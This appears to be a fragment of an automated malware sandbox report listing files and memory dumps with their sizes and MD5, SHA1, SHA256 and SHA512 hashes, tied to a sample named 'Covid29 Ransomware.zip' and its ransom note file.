                                                      Filesize

                                                      1.3MB

                                                      MD5

                                                      35af6068d91ba1cc6ce21b461f242f94

                                                      SHA1

                                                      cb054789ff03aa1617a6f5741ad53e4598184ffa

                                                      SHA256

                                                      9ac99df89c676a55b48de00384506f4c232c75956b1e465f7fe437266002655e

                                                      SHA512

                                                      136e3066c6e44af30691bcd76d9af304af0edf69f350211cf74d6713c4c952817a551757194b71c3b49ac3f87a6f0aa88fb80eb1e770d0f0dd82b29bfce80169

                                                    • C:\Users\Admin\Desktop\covid29-is-here.txt

                                                      Filesize

                                                      861B

                                                      MD5

                                                      c53dee51c26d1d759667c25918d3ed10

                                                      SHA1

                                                      da194c2de15b232811ba9d43a46194d9729507f0

                                                      SHA256

                                                      dd5b3d185ae1809407e7822de4fced945115b48cc33b2950a8da9ebd77a68c52

                                                      SHA512

                                                      da41cef03f1b5f21a1fca2cfbf1b2b180c261a75d391be3a1ba36e8d4d4aefab8db024391bbee06b99de0cb0b8eb8c89f2a304c27e20c0af171b77db33b2d12c

                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware.zip

                                                      Filesize

                                                      1.7MB

                                                      MD5

                                                      272d3e458250acd2ea839eb24b427ce5

                                                      SHA1

                                                      fae7194da5c969f2d8220ed9250aa1de7bf56609

                                                      SHA256

                                                      bbb5c6b4f85c81a323d11d34629776e99ca40e983c5ce0d0a3d540addb1c2fe3

                                                      SHA512

                                                      d05bb280775515b6eedf717f88d63ed11edbaae01321ec593ecc0725b348e9a0caacf7ebcd2c25a6e0dc79b2cdae127df5aa380b48480332a6f5cd2b32d4e55c

                                                    • C:\Users\Admin\Downloads\Covid29 Ransomware.zip:Zone.Identifier

                                                      Filesize

                                                      26B

                                                      MD5

                                                      fbccf14d504b7b2dbcb5a5bda75bd93b

                                                      SHA1

                                                      d59fc84cdd5217c6cf74785703655f78da6b582b

                                                      SHA256

                                                      eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                      SHA512

                                                      aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                    • memory/1252-368-0x0000000000DC0000-0x0000000000DE0000-memory.dmp

                                                      Filesize

                                                      128KB

                                                    • memory/3452-367-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                      Filesize

                                                      864KB

                                                    • memory/4972-444-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/4972-439-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                      Filesize

                                                      1.8MB

                                                    • memory/4972-326-0x0000000000400000-0x00000000005D5000-memory.dmp

                                                      Filesize

                                                      1.8MB